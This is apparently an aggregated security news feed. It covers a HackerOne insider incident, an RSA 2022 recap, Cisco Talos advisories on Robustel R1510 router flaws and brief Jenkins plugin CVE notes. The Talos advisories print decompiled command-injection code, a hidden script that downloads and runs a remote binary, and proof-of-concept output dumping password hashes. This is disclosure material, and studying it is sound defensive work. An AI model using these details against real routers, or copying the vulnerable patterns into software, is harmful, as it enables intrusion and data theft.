Vulnerability coordination and bug bounty platform HackerOne on Friday disclosed that a former employee at the firm improperly accessed security reports submitted to it for personal gain.
"The person anonymously disclosed this vulnerability information outside the HackerOne platform with the goal of claiming additional bounties," it said. "In under 24 hours, we worked quickly to contain the

Vulnerability coordination and bug bounty platform HackerOne on Friday disclosed that a former employee at the firm improperly accessed security reports submitted to it for personal gain.

"The person anonymously disclosed this vulnerability information outside the HackerOne platform with the goal of claiming additional bounties," it said. "In under 24 hours, we worked quickly to contain the incident by identifying the then-employee and cutting off access to data."

The employee, who had access to HackerOne systems between April 4 and June 23, 2022, for triaging vulnerability disclosures associated with different customer programs, has since been terminated by the San Francisco-headquartered company as of June 30.

Calling the incident as a "clear violation" of its values, culture, policies, and employment contracts, HackerOne said it was alerted to the breach on June 22 by an unnamed customer, which asked it to "investigate a suspicious vulnerability disclosure" through an off-platform communication from an individual with the handle "rzlr" using "aggressive" and "intimidating" language.

Subsequently, analysis of internal log data used to monitor employee access to customer disclosures traced the exposure to a rogue insider, whose goal, it noted, was to re-submit duplicate vulnerability reports to the same customers using the platform to receive monetary payouts.

"The threat actor created a HackerOne sockpuppet account and had received bounties in a handful of disclosures," HackerOne detailed in a post-mortem incident report, adding seven of its customers received direct communication from the threat actor.

"Following the money trail, we received confirmation that the threat actor's bounty was linked to an account that financially benefited a then-HackerOne employee. Analysis of the threat actor's network traffic provided supplemental evidence connecting the threat actor's primary and sockpuppet accounts."

HackerOne further said it has individually notified customers about the exact bug reports that were accessed by the malicious party along with the time of access, while emphasizing it found no evidence of vulnerability data having been misused or other customer information accessed.

On top of that, the company noted it aims to implement additional logging mechanisms to improve incident response, isolate data to reduce the "blast radius," and enhance processes in place to identify anomalous access and proactively detect insider threats.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

HackerOne Employee Caught Stealing Vulnerability Reports for Personal Gains

The RSA conference in San Francisco always feels like drinking from a fire hose but especially this year at the first in-person RSA since the pandemic began.

It had been a few years, so with much anticipation, and not a little trepidation, 26,000 people descended on San Francisco for the RSA Conference. Vendors were eager to get back out in front of a live audience and the expo floor was tightly packed with more than 400 exhibitors. Themes emerged in numerous services.

Let’s start with data security. With all the talk of application security needing to "shift left", (i.e., embedding security processes into the development pipeline to reduce the attack surface of code before it enters production), it is only natural that data security should move in the same direction.

Keys and certificates associated with applications and containers need to be protected, as any organization that has adopted a DevSecOps approach will be aware. Indeed, in an ideal scenario, capabilities such as key management and encryption are baked into the workflows of developers and DevSecOps teams and "just work."

Identity was at the center of many a discussion. Achieving "zero trust" transformation with passwordless authentication received renewed attention at the show. Getting rid of passwords has been the holy grail for many organizations and individuals over the past 30 years, and Omdia believes that 2022 will be the year that we finally start to properly phase out passwords.

When it comes to infrastructure security, figuring out the 'risk' of cloud environments was a key topic of interest. Vendors such as Palo Alto Networks, Orca, Wiz, Check Point, and many, many others highlighted tooling to enable deeper understanding of one's cloud estate, with an increasing emphasis on cloud permissions management as a key focus area.

Working to secure the development process for creating cloud environments was another area much discussed, with Infrastructure as Code (IaC) a key pattern for achieving necessary scale. The broad interest in API security was also noteworthy. Specialized vendors such as Salt Security, Wallarm, Cequence, and others joined several of the cloud security vendors in adding API security capabilities to their offerings.

Wrapping up the key topics around infrastructure security, it was noticeable how prevalent the conversations around Secure Access Service Edge (SASE) were, in terms of major security vendors aligning themselves to the broader SASE theme or to its subset known as SSE. Cisco, Netskope, Versa Networks, Forcepoint, among others, demonstrated integrated offerings in this space.

Moving on to SecOps, RSA Conference 2022 will perhaps be seen as the first big opportunity for extended detection and response (XDR) vendors to make their case. Numerous vendors made significant XDR announcements, including BitDefender (launching GravityZone XDR solution), CrowdStrike (expanding Falcon's XDR module), and RSA Group (debuting NetWitness XDR), among others. XDR has the potential to revolutionize enterprise threat detection and incident response (TDIR), making it faster, easier, and potentially even cheaper to find, analyze, and fix cybersecurity threats.

Proactive approaches such as risk-based vulnerability management and attack surface management (ASM) were also in the spotlight. It has been clear throughout 2022 that ASM products are quickly becoming an important component of broader proactive posture management strategies. The market, particularly for external ASM (EASM) solutions, has been busy with both investment and M&A activity.

RSA 2022: Omdia Research Take Aways

A command execution vulnerability exists in the clish art2 functionality of Robustel R1510 3.3.0. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

A command execution vulnerability exists in the clish art2 functionality of Robustel R1510 3.3.0. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

Robustel R1510 3.3.0

**Product URLs**

R1510 - https://www.robustel.com/en/product/r1510-industrial-cellular-vpn-router/

**CVSSv3 Score**

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-489 - Leftover Debug Code

**Details**

The R1510 is an industrial cellular router. It offers several advanced software like an innovative use of Open VPN, Cloud management, data over-use guard, smart reboot and others.

The R1510 has enabled the SSH service. But, instead of providing a linux shell it prompt a CLISH shell. This shell allow to express, through XML configuration files, different type of commands.

Here it is the prompt after login as admin:

    ssh admin@192.168.0.1    
    (admin@192.168.0.1) Password: 
    # 
    !              Comments
    add            Add a list entry of configuration
    clear          Clear statistics
    config         Configuration operation
    debug          Output debug information to the console
    del            Delete a list entry of configuration
    do             Set the level state of the do
    exit           Exit from the CLI
    help           Display an overview of the CLI syntax
    ovpn_cert_get  Download OpenVPN certificate file via http or ftp
    ping           Send messages to network hosts
    reboot         Halt and perform a cold restart
    set            Set system configuration
    show           Show system configuration
    status         Show running system information
    tftpupdate     Update firmware or configuration file using tftp
    traceroute     Print the route packets trace to network host
    trigger        Trigger action
    urlupdate      Update firmware via http or ftp
    ver            Show version of firmware
    
    # 
    

An hidden command exist in this menu that is called art2:

    # art2 
    String  Version of art2
    #
    

When called the following shell script is executed:

    #!/bin/sh
    #build temporary directory
    
    if [ $# -lt 1 ]; then
        echo "Usage : $0 <Version>"
        exit 1;
    fi
    
    VER=$1
    DIR=/tmp/art2
    if [ ! -d ${DIR} ]; then
            mkdir ${DIR}
    fi
    cd ${DIR}
    
    #download art.ko and nart.out
    
    rm -rf *
    
    wget http://192.168.0.10/r1510ArtFile.tar.gz
    
    tar -xzvf r1510ArtFile.tar.gz
    
    #change mode of art.ko and nart.out, add execute ability.
    chmod 755 r1510-art-factory-${VER}.ko r1510-nart-factory-${VER}.bin
    
    [...]
    
    #start art application
    ./r1510-nart-factory-${VER}.bin -console
    

This script will download the file r1510ArtFile.tar.gz from the host with address 192.168.0.10. Then it will unpack the file and eventually execute the file r1510-nart-factory-${VER}.bin contained in it. This can lead to arbitrary command execution.

**Exploit Proof of Concept**

Following the execution of art2 with 0 as argument.

    # art2 0
    # Connecting to 192.168.0.10 (192.168.0.10:80)
    r1510ArtFile.tar.gz  100% |***************************************|   171   0:00:00 ETA
    r1510-nart-factory-0.bin
    [...]
    root
    root:$1$ciDDcCQI$ksDdbx2gX84EQfRCUxKGA/:10933:0:99999:7:::
    admin:$1$0Y1zMICY$2676GjK83hpbydoXDggR8/:16506:0:99999:7:::
    bin:*:10933:0:99999:7:::
    daemon:*:10933:0:99999:7:::
    adm:*:10933:0:99999:7:::
    lp:*:10933:0:99999:7:::
    sync:*:10933:0:99999:7:::
    [...]
    

Inside the r1510-nart-factory-0.bin there are two commands, whoami and cat /etc/passwd.

**Timeline**

2022-06-27 - Initial vendor contact  
2022-06-28 - Vendor Disclosure  
2022-06-30 - Public Release  

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-32585: TALOS-2022-1570 || Cisco Talos Intelligence Group

Multiple command injection vulnerabilities exist in the web_server ajax endpoints functionalities of Robustel R1510 3.3.0. A specially-crafted network packets can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.The `/ajax/clear_tools_log/` API is affected by command injection vulnerability.

**Summary**

Multiple command injection vulnerabilities exist in the web\_server ajax endpoints functionalities of Robustel R1510 3.3.0. A specially-crafted network packets can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.

**Tested Versions**

Robustel R1510 3.3.0

**Product URLs**

R1510 - https://www.robustel.com/en/product/r1510-industrial-cellular-vpn-router/

**CVSSv3 Score**

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**Details**

The R1510 is an industrial cellular router. It offers several advanced software like an innovative use of Open VPN, Cloud management, data over-use guard, smart reboot and others

The R1510 has a web server that manages several endpoints. One group of endpoints have the following form /ajax/<API_endpoint>/. Several of those endpoints use unsafe functions with user provided parameters, like the standard system function, and a custom one called sysprintf.

Here it is sysprintf:

    void sysprintf(char *format_string,char *param_2,char *char*,char *param_4)
    
    {
      [...]
    
      va_list_ptr = va_list;
      va_list[0] = param_2;
      va_list[1] = char*;
      va_list[2] = param_4;
      vsnprintf(shell_command,0x200,format_string,va_list_ptr);                                             [1]
      system(shell_command);                                                                                [2]
      return;
    }
    

At [1] a string is formatted, using the first argument of the function as format string and the others parameters as format string arguments. If one of the argument is controllable by an attacker a command injection would occur at [2].

**CVE-2022-33325 - /ajax/clear\_tools\_log/ command injection**

This command injection is in the /ajax/clear_tools_log/ API.

The function that handles that endpoint is:

    undefined4 /ajax/clear_tools_log/(Webs *webs)
    
    {
      [...]
    
      [...]
          tools_name = (char *)websGetVar(webs,"tools_name",0);                                             [3]
          iVar1 = string_is_not_empty(tools_name);
          if (iVar1 != 0) {
            TOOLS_LOG_FILE_MARK = websGetSessionVar(webs,"_:TOOLS_LOG_FILE_MARK:_","0");
            pcVar5 = (char *)sfmt("rm %s/wlf_%s_%s.log -rf","/tmp/log/tools",tools_name,                    [4]
                                  TOOLS_LOG_FILE_MARK);
            iVar1 = system(pcVar5);                                                                         [5]
            [...]
    

At [3] the tools_name variable is fetched and then, at [4], used to format a string. The formatted string is then used at [5] as argument for the system function. This can lead to a command injection.

**CVE-2022-33326 - /ajax/config\_rollback/ command injection**

This command injection is in the /ajax/config_rollback/ API.

The function that handles that endpoint is:

    undefined4 /ajax/config_rollback/(Webs *webs)
    
    {
      [...]
    
      [...]
            archive_param = websGetVar(webs,"archive",0);                                                   [6]
            iVar4 = dir_exists("/app/config/rollback_archive");
            iVar1 = -1;
            if (iVar4 != 0) {
              sysprintf("mkdir -p %s","/tmp/config_rollback");
              iVar1 = sysprintf("tar -C %s -zxf %s/%s.tgz && uci -c import %s/config.xml && rm %s -rf",
                                "/tmp/config_rollback","/app/config/rollback_archive",archive_param,
                                "/tmp/config_rollback","/tmp/config_rollback");                             [7]
              iVar1 = -(uint)(iVar1 != 0);
            }
    

At [6] the archive variable is fetched and then used as argument of the sysprintf function at [7]. This can lead to a command injection.

**CVE-2022-33327 - /ajax/remove\_sniffer\_raw\_log/ command injection**

This command injection is in the /ajax/remove_sniffer_raw_log/ API.

The function that handles that endpoint is:

    undefined4 /ajax/remove_sniffer_raw_log/(Webs *webs)
    
    {
      [...]
    
      [...]
          file_name = (char *)websGetVar(webs,"file_name",0);                                               [8]
          if ((file_name != (char *)0x0) && (pcVar5 = strstr(file_name,".."), pcVar5 == (char *)0x0)) {
            shell_command = (char *)sfmt("rm %s/%s -rf","/tmp/log/sniffer",file_name);                      [9]
            iVar1 = system(shell_command);                                                                  [10]
            [...]
    

At [8] the file_name variable is fetched and then, at [9], used to format a string. The formatted string is then used at [10] as argument for the system function. This can lead to a command injection.

**CVE-2022-33328 - /ajax/remove/ command injection**

This command injection is in the /ajax/remove/ API.

The function that handles that endpoint is:

    undefined4 /ajax/remove/(Webs *webs)
    
    {
      [...]
    
      [...]
          file_name = (char *)websGetVar(webs,"file_name",0);                                               [11]
          if ((file_name != (char *)0x0) &&
             (shell_command = strstr(file_name,".."), shell_command == (char *)0x0)) {
            shell_command = (char *)sfmt("rm %s -rf",file_name);                                            [12]
            iVar1 = system(shell_command);                                                                  [13]
            [...]
    }
    

At [11] the file_name variable is fetched and then, at [12], used to format a string. The formatted string is then used at [13] as argument for the system function. This can lead to a command injection.

**CVE-2022-33329 - /ajax/set\_sys\_time/ command injection**

This command injection is in the /ajax/set_sys_time/ API.

The function that handles that endpoint is:

    undefined4 /ajax/set_sys_time/(Webs *webs)
    
    {
      [...]
    
      [...]
          date = websGetVar(webs,"date",0);                                                                 [14]
          if ((date != 0) && (iVar3 = string_is_empty(date), iVar3 == 0)) {
            sysprintf("date \"%s\"",date);                                                                  [15]
            [...]
    }
    

At [14] the date variable is fetched and then used at [15] as argument of the sysprintf function. This can lead to a command injection.

**Timeline**

2022-06-27 - Initial vendor contact  
2022-06-28 - Vendor Disclosure  
2022-06-30 - Public Release  

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-33325: TALOS-2022-1573 || Cisco Talos Intelligence Group

Multiple command injection vulnerabilities exist in the web_server action endpoints functionalities of Robustel R1510 3.3.0. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.The `/action/import_cert_file/` API is affected by command injection vulnerability.

**Summary**

Multiple command injection vulnerabilities exist in the web\_server action endpoints functionalities of Robustel R1510 3.3.0. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.

**Tested Versions**

Robustel R1510 3.3.0

**Product URLs**

R1510 - https://www.robustel.com/en/product/r1510-industrial-cellular-vpn-router/

**CVSSv3 Score**

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**Details**

The R1510 is an industrial cellular router. It offers several advanced software like an innovative use of Open VPN, Cloud management, data over-use guard, smart reboot and others.

The R1510 has a web server that manages several endpoints. One group of endpoints have the following form /action/<API_endpoint>/. Several of those endpoints use unsafe functions with user provided parameters, like the standard system function, and a custom one called sysprintf.

Here it is sysprintf:

    void sysprintf(char *format_string,char *param_2,char *char*,char *param_4)
    
    {
      [...]
    
      va_list_ptr = va_list;
      va_list[0] = param_2;
      va_list[1] = char*;
      va_list[2] = param_4;
      vsnprintf(shell_command,0x200,format_string,va_list_ptr);                                             [1]
      system(shell_command);                                                                                [2]
      return;
    }
    

At [1] a string is formatted, using the first argument of the function as format string and the others parameters as format string arguments. If one of the argument is controllable by an attacker a command injection would occur at [2].

**CVE-2022-33312 - /action/import\_cert\_file/ command injection**

This command injection is in the /action/import_cert_file/ API.

The function that handles that endpoint is:

    void /action/import_cert_file/(Webs *webs)
    
    {
     [...]
    
      [...]
          path = (char *)websGetVar(webs,"path",0);                                                         [3]
          if ((path != (char *)0x0) &&
             (target_file = websGetVar(webs,"target_file",0), target_file != 0)) {
            hash = scaselessmatch(webs->method,"POST");
            iVar7 = 0;
            if (hash != 0) {
              pWVar1 = hashFirst((char)webs->files);
              while (pWVar1 != (WebsKey *)0x0) {
                ppcVar9 = *(char ***)&(pWVar1->content).value;
                hash = dir_exists(path);                                                                    [4]
                if (hash == 0) {
                  sysprintf("mkdir -p %s",path);                                                            [5]
                }
                [...]
     }            At `[3]` the variable `path` is fetched, then at `[4]` it is checked if its value correspond to an existing directory. If the directory does not exist the value will be used, at `[5]`, as argument of the `sysprintf` function. This can lead to a command injection.
    

**CVE-2022-33313 - /action/import\_https\_cert\_file/ command injection**

This command injection is in the /action/import_https_cert_file/ API.

The function that handles that endpoint is:

    void /action/import_https_cert_file/(Webs *webs)
    
    {
      [...]
    
      [...]
          type_var = websGetVar(webs,"type",0);
          path_var = websGetVar(webs,"path",0);                                                             [6]
          if ((type_var != 0) && (path_var != 0)) {
            iVar1 = scaselessmatch(webs->method,"POST");
            if (iVar1 != 0) {
              pWVar2 = hashFirst((char)webs->files);
              while (pWVar2 != (WebsKey *)0x0) {
                uploaded_location = *(undefined4 **)&(pWVar2->content).value;
                iVar1 = string_matched(type_var,"ca");
                if (iVar1 == 0) {
                  iVar1 = string_matched(type_var,"private_key");
                  if (iVar1 != 0) {
                    path_formatted_value = "%s/server.key";
                    goto LAB_00481458;
                  }
                }
                else {
                  path_formatted_value = "%s/server.crt";
    LAB_00481458:
                  path_formatted_value = (char *)sfmt(path_formatted_value,path_var);                       [7]
                }
                if (path_formatted_value != (char *)0x0) {
                  sysprintf("mv %s %s -f",*uploaded_location,path_formatted_value);                         [8]
                  [...]
    }
    

At [6] the variable path is fetched, then at [7] it is used as argument to format a string based on another provided variable. The formatted string is then used at [8] as argument for the sysprintf function. This can lead to a command injection.

**CVE-2022-33314 - /action/import\_sdk\_file/ command injection**

This command injection is in the /action/import_sdk_file/ API.

The function that handles that endpoint is:

    void /action/import_sdk_file/(Webs *webs)
    
    {
      [...]
    
      [...]
          path_param = websGetVar(webs,"path",0);                                                           [9]
          if (path_param != 0) {
            websSetStatus(webs,200);
            websWriteHeaders(webs,0xffffffff,0);
            websWriteHeader(webs,"Content-Type","text/html");
            websWriteEndHeaders(webs);
            iVar1 = scaselessmatch(webs->method,"POST");
            if (iVar1 != 0) {
              pWVar4 = hashFirst((char)webs->files);
              while (pWVar4 != (WebsKey *)0x0) {
                ppcVar8 = *(char ***)&(pWVar4->content).value;
                iVar1 = dir_exists(path_param);                                                             [10]
                if (iVar1 == 0) {
                  sysprintf("mkdir -p %s",path_param);                                                      [11]
                }
                [...]
    }            
    

At [9] the variable path is fetched, then at [10] it is checked if its value correspond to an existing directory. If the directory does not exist the value will be used, at [11] as argument of the sysprintf function. This can lead to a command injection.

**Timeline**

2022-06-27 - Initial vendor contact  
2022-06-28 - Vendor Disclosure  
2022-06-30 - Public Release  

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-33312: TALOS-2022-1572 || Cisco Talos Intelligence Group

A data removal vulnerability exists in the web_server /action/remove/ API functionality of Robustel R1510 3.3.0. A specially-crafted network request can lead to arbitrary file deletion. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

A data removal vulnerability exists in the web\_server /action/remove/ API functionality of Robustel R1510 3.3.0. A specially-crafted network request can lead to arbitrary file deletion. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

Robustel R1510 3.3.0

**Product URLs**

R1510 - https://www.robustel.com/en/product/r1510-industrial-cellular-vpn-router/

**CVSSv3 Score**

8.7 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:H

**CWE**

CWE-20 - Improper Input Validation

**Details**

The R1510 is an industrial cellular router. It offers several advanced software like an innovative use of Open VPN, Cloud management, data over-use guard, smart reboot and others.

The R1510 has a web server that manages several APIs. One of these API is /ajax/remove/. This function allows to remove files, checking for possible path traversal in the provided input.

Here it is the function that handles the /ajax/remove/ API:

    undefined4 /ajax/remove/(Webs *webs)
    
    {
      [...]
    
      [...]
          file_name = (char *)websGetVar(webs,"file_name",0);                                               [1]
          if ((file_name != (char *)0x0) &&
             (shell_command = strstr(file_name,".."), shell_command == (char *)0x0)) {                      [2]
            shell_command = (char *)sfmt("rm %s -rf",file_name);                                            [3]
            iVar1 = system(shell_command);
            [...]
    }
    

At [1] the variable file_name is fetched and then used, at [3], to create the string rm <file_name> -rf. The function checks, at [2], if the provided filen_name contains ... This check, allegedly, is used to prevent path traversal. But because file_name can be an absolute path, an attacker, able to control file_name would be able to delete arbitrary file and directory.

**Timeline**

2022-06-27 - Initial vendor contact  
2022-06-28 - Vendor Disclosure  
2022-06-30 - Public Release  

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-28127: TALOS-2022-1571 || Cisco Talos Intelligence Group

A missing permission check in Jenkins XebiaLabs XL Release Plugin 22.0.0 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.

CVE-2022-34779: Jenkins Security Advisory 2022-06-30

Jenkins Plot Plugin 2.1.10 and earlier does not escape plot descriptions, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

CVE-2022-34783: Jenkins Security Advisory 2022-06-30

A missing check in Jenkins RQM Plugin 2.8 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.

CVE-2022-34810: Jenkins Security Advisory 2022-06-30

A cross-site request forgery (CSRF) vulnerability in Jenkins Deployment Dashboard Plugin 1.0.10 and earlier allows attackers to connect to an attacker-specified HTTP URL using attacker-specified credentials.

Tag

#cisco